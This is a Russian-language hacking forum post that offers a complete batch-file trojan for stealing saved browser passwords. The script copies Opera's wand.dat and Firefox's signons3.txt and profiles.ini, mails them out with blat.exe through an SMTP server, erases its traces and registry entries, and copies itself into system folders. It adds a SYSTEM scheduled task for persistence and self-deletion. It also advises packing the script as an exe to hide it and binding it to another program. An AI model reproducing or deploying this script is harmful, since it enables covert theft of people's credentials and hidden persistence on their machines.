Крадем все пароли Opera и Mozilla!
Вот написал универсальный скрипт (но в нем могут быть недочеты) для кражи паролей Opera и Mozilla
теперь стало больше возможностей может красть пароли от Opera 10 и если не сможет скопировать файл с паролями от Mozilla так как у некоторых бывают разные названия профилей (9vf96daw.default) то отсылает файл profiles.ini в нем название текущего профиля,после отсылки удаляет все следы от blat.exe в реестре.
signons3.txt от Mozilla Firefox. используем прогу Blat.exe скачать её можно с wwwblat.net
вот его тело:
Код:
@%SYSTEMROOT%/system32/blat.exe -install -server smtp.mail.ru -port 25 -f e-mail@mail.ru -u email -pw pass >nul
cd %APPDATA%\Opera\Opera\profile\ >nul
copy wand.dat C:\wand.rar >nul
blat.exe -subject "hacK" -body "Урожай собран!v9" -to e-mail@mail.ru -attach c:\wand.rar >nul
cd c:\ >nul
erase wand.rar >nul
cd %APPDATA%\Opera\Opera 10 Preview!\profile\ >nul
copy wand.dat C:\wand.rar >nul
blat.exe -subject "hacK" -body "Урожай собран!!v10" -to e-mail@mail.ru -attach c:\wand.rar >nul
cd c:\ >nul
erase wand.rar >nul
cd %APPDATA%\Mozilla\Firefox\Profiles\9vf96daw.default\ >nul
copy signons3.txt C:\signons3.rar >nul
blat.exe -subject "hacK" -body "Урожай собран!!" -to e-mail@mail.ru -attach c:\signons3.rar >nul
cd %APPDATA%\Mozilla\Firefox\
copy profiles.ini c:\profiles.rar
blat.exe -subject "profiles.ini" -body "Урожай собран!!!" -to e-maill@mail.ru -attach c:\profiles.rar >nul
erase c:\profiles.rar
cls >nul
cd c:\ >nul
erase signons3.rar >nul
copy %0 %systemroot%\amatory_crack.bat >nul
copy %0 %systemroot%\system32\amatory_crack.bat >nul
reg delete "Hklm\SOFTWARE\Public Domain" /f
Прибомбасы:
Erase %0 - удаляет сам себя
schtasks /create /tn "security" /sc minute /mo 25 /ru "NT AUTHORITY\SYSTEM" /tr %systemroot%\system32\amatory_crack.bat - запускает скрипт каждые 25мн для тех у кого ip постоянно меняется.
Используем прогу BatToExe Converter для шифрования и скрытия!скачать её можно сдесь ну вот троян почти готов осталось склеить скакой нибудь прогой!